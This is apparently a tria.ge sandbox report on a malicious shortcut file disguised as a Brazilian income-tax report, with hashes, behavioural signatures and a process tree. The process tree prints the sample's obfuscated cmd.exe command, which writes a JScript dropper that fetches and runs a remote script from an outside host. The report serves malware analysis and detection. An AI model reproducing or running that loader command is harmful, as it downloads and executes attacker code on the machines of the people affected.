Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
187s -
max time network
192s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
06/12/2022, 11:09
Static task
static1
Behavioral task
behavioral1
Sample
RelatorioIRPF2022x_763.59941234.894541.08054.lnk
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
RelatorioIRPF2022x_763.59941234.894541.08054.lnk
Resource
win10v2004-20221111-en
General
-
Target
RelatorioIRPF2022x_763.59941234.894541.08054.lnk
-
Size
493B
-
MD5
5d675c77ace428b2959c9579f4e3605c
-
SHA1
b50d3aa98338a52c047a6cc0399046b8e65c8178
-
SHA256
0d43d8d11bc22acb24fd9b02ed43fa2e40ba29f07272d278a33d412782435119
-
SHA512
3ae5e8445781b77852fd6d6cdc07459e531865418a91f5a008dd0934ed160db26a4a39fb5c5ed725a9670cfe76ab34a2f61cf5a61278aeb49a7d4dd5c04c32a8
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 31 1728 WScript.exe 35 1728 WScript.exe 36 1728 WScript.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings cmd.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3196 wrote to memory of 3876 3196 cmd.exe 84 PID 3196 wrote to memory of 3876 3196 cmd.exe 84 PID 3876 wrote to memory of 2560 3876 cmd.exe 85 PID 3876 wrote to memory of 2560 3876 cmd.exe 85 PID 3876 wrote to memory of 656 3876 cmd.exe 86 PID 3876 wrote to memory of 656 3876 cmd.exe 86 PID 656 wrote to memory of 1728 656 cmd.exe 87 PID 656 wrote to memory of 1728 656 cmd.exe 87
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\RelatorioIRPF2022x_763.59941234.894541.08054.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /V/D/c "md C:\ZUn9AOQ\&&s^eT SBFF=C:\ZUn9AOQ\^ZUn9AOQ&&S^Et NGOR=v2C7ar CDl3="sc"+"^r";DDl3="i^p"+"t^:2C7h";EDl3="T"+"t^P"+":";G2C7et^Ob^j2C7ec^t(CDl3+DDl3+EDl3+'&&s^ET E67=HTXCAHTXCAwaew.tnemllorne.cyouHTXCA?1HTXCA');&&s^Et/^p V8JJ="!NGOR:2C7=!!E67:HTXCA=/!"<n^ul > !SBFF!.^jS|ca^ll c^a^ll !SBFF!.jS"2⤵
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt/p V8JJ="var CDl3="sc"+"^r";DDl3="i^p"+"t^:h";EDl3="T"+"t^P"+":";GetObject(CDl3+DDl3+EDl3+'//waew.tnemllorne.cyou/?1/');" 0<nul 1>C:\ZUn9AOQ\ZUn9AOQ.jS"3⤵PID:2560
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" call call C:\ZUn9AOQ\ZUn9AOQ.jS "3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ZUn9AOQ\ZUn9AOQ.jS"4⤵
- Blocklisted process makes network request
PID:1728
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
107B
MD529cf655d6b28293d388268e308f7b554
SHA1d43da5881b3968e81ba3e5e61f580c5f860302d9
SHA256776fee39e41f81d10fa08c53fedf90716c97b5483d158c2fdbd5053a85e6d207
SHA512eeabd784e408e4f62e35994e89acb5c94418548b4ba56b4ebaf2c15891a04aa587b32c1ac3449cbe58e5525d536890c0d17f754bf36ca00725461b9068d9d0df